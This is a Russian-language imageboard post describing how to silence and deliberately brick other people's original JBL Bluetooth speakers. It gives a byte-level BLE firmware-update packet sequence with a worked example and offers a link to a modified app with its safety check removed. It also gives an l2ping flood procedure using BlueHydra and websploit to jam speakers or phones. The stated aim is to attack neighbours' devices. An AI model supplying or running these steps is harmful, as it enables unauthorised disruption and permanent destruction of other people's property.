>>371530
Нашёл способ выключить колонку (и возможно окирпичить) с помощью режима обновления. Пока что жду жертву чтобы проверить.
На 4pda и подобных сайтах пишут, что обновление часто приводит к кирпичу, особенно если его прервать.
На гите нашлось чьё-то самодельное приложение для работы с колонками JBL и исходники к нему (https://github.com/andreww7985/connect-plus/releases)
Убрал из него проверку на подключение колонки к зарядке и кое-как скомпилировал.
Подключившись к колонке попытался загрузить случайный файл, при этом колонка сразу же заткнулась.
Загрузка файла ~750 кб идёт очень медленно, поэтому через минут 5 колонку выключили или убрали. В тот день больше не слышал, но снова находил при сканировании, так что думаю она просто перезагрузилась и работает дальше, т.к. конечный размер и CRC не совпали.
Поэтому в следующий раз попробую быстро загрузить небольшой файл и посмотреть, заткнётся ли насовсем. Это был бы вин.
В любом случае так можно глушить оригинальные JBL (подделки без BLE не работают).
Скомпилировал с костылями, вырезал всю аналитику (естественно автора не спрашивал и имя не менял). Иногда не сразу, но подключается. http://rgho.st/private/8mpDLxRtm/29c42b48490d565dd1ddd1b6604b0c16

Можно попробовать сделать приложение на телефон, но учитывая небольшую дальность блютуза и то, что обычно пидоры шумят возле дома, будет лучше сделать скрипт для gatttool или тому подобного. Я не кодер, поэтому приходится долго разбираться во всём. Если кто-то может написать, то алгоритм ниже:

Отправляем AA 43 08 [crc2] [crc3] [crc0] [crc1] [размер файла в HEX (4 байта)]
Получаем ответ:
AA 00 02 43 00
AA 45 01 01
(возможно уже на этом этапе выключается звук, нужно проверить.. либо после следующего шага)
Отправляем AA 44 68 [первые 104 байта прошивки]
(68 это размер 104 в HEX, менять не пробовал)
Получаем ответ
AA 00 02 44 00
AA 45 01 02
Отправляем AA 44 68 [следующие 104 байта прошивки]
Снова получаем
AA 00 02 44 00
AA 45 01 02
и так до конца файла.
Затем колонка должна сама перезагрузиться (предположительно в кирпич)

т.е. если размер файла = 756436, CRC32 = 63 3b d5 19, то для включения режима обновления отправляем: AA 43 08 D5 19 63 3B 00 0B 8A D4.
Как считается CRC32 с таблицей мне непонятно, но код там простой. Если будет достаточно отправить пару пакетов, то и считать каждый раз не нужно.

Приложение то запускал на виртуалке с образа android-x86-6.0-r3 Нужен именно шестой, т.к. у него стек блютуза Bluez, и он нормально работает с USB-адаптером, а также поддерживает l2ping, которым можно обнаружить скрытую колонку с известным адресом.

С ДДОС всё просто, в начале треда есть видео (325315). Всё можно на виртуалке с kali или другим дистрибутивом.
Ставим сканер BlueHydra (https://github.com/pwnieexpress/blue_hydra), ищем адрес колонки или телефона. Выполняем l2ping -s 600 [мак_адрес] в нескольких окнах. Можно использовать websploit, он вроде автоматизирует этот процесс (особо не проверял). Где-то советовали писать размер пакета 999 но по факту больше 600 не отправляет.